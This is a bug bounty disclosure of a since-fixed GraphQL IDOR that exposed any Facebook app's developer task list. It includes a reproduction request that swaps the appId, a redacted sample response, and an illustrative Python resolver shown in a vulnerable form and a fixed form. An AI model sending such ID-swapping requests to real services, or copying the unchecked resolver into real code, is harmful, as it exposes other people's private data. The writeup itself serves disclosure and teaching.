GraphQL IDOR: Access Developer Tasks List of any Facebook Application (Bug Bounty)
--
This vulnerability could have allowed a malicious user to access the developer task lists of any Facebook application. Developer tasks contain private information that should only be accessible to the authorized developer of the relevant Facebook application.
While browsing https://developers.facebook.com/apps/ I noticed a GraphQL request that was returning the tasks list of my Facebook application.
By intercepting the request and changing the appId value to the ID of a third-party Facebook application, I was able to access the tasks list of the targeted app.
Reproduction Steps
1) Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following parameters in the request body:
&variables={"appId":"X"}&doc_id=265437575802287
Where X is the appId
The GraphQL response will return the developer tasks list of the targeted Facebook application:
{
  "data": {
    "app_tasks": [
      {
        "id": "REDACTED",
        "app_id": "X",
        "app_name": "REDACTED",
        "task_objective": "REDACTED",
        "deadline": 1606147652,
        "completion_time": 1605495171
      }
    ],
    "user_tasks_open_count": 0
  },
  "extensions": {
    "is_final": true
  }
}
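As an added illustration (not Facebook's code, and not part of the original post): a small Python model of an app_tasks resolver that shows the IDOR pattern, a resolver that trusts the client-supplied appId, next to the fixed version that checks the viewer's relationship to the app before returning anything. The viewer ids, app ids and task records are constructed, and the endpoint wrapper is a stand-in, not the real /api/graphql/ handler.

```python
# Added example (not Facebook's code): a minimal model of an app_tasks
# GraphQL resolver, showing the IDOR pattern next to the authorization fix.
# All viewer ids, app ids and task records below are constructed.

# Constructed ownership data: which viewers are developers of which app.
APP_DEVELOPERS = {
    "1001": {"alice"},         # alice's own app
    "2002": {"bob", "carol"},  # a third-party app
}

# Constructed task records keyed by app id; shape mirrors the writeup's response.
APP_TASKS = {
    "1001": [{"id": "t1", "app_id": "1001", "app_name": "AliceApp",
              "task_objective": "REDACTED", "deadline": 1606147652,
              "completion_time": 1605495171}],
    "2002": [{"id": "t2", "app_id": "2002", "app_name": "BobApp",
              "task_objective": "REDACTED", "deadline": 1606147652,
              "completion_time": None}],
}

class Unauthorized(Exception):
    """Raised when the viewer is not a developer of the requested app."""

def is_app_developer(viewer_id, app_id):
    """Object-level check: is this viewer on the app's developer list?"""
    return viewer_id in APP_DEVELOPERS.get(app_id, set())

def resolve_app_tasks_vulnerable(viewer_id, app_id):
    """IDOR: trusts the client-supplied appId and never consults the viewer."""
    return APP_TASKS.get(app_id, [])

def resolve_app_tasks_fixed(viewer_id, app_id):
    """Checks the viewer's relationship to the object before returning it;
    a forbidden app and an unknown app produce the same error."""
    if not is_app_developer(viewer_id, app_id):
        raise Unauthorized("viewer is not a developer of app %s" % app_id)
    return APP_TASKS.get(app_id, [])

def handle_graphql(resolver, viewer_id, variables):
    """Stand-in for the /api/graphql/ endpoint: runs the resolver and wraps
    the result in the response shape shown in the writeup."""
    try:
        tasks = resolver(viewer_id, variables["appId"])
    except Unauthorized as exc:
        return {"data": None, "errors": [{"message": str(exc)}]}
    open_count = sum(1 for t in tasks if t["completion_time"] is None)
    return {"data": {"app_tasks": tasks, "user_tasks_open_count": open_count},
            "extensions": {"is_final": True}}
```

The point of the fixed resolver is that authorization is decided per object from the viewer's relationship to the app, not from anything the client sends.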
Timeline
January 6, 2021: Report Sent
January 8, 2021: Acknowledged by Facebook
January 13, 2021: Fixed by Facebook
February 1, 2021: Bounty awarded by Facebook
Twitter: https://twitter.com/amineaboud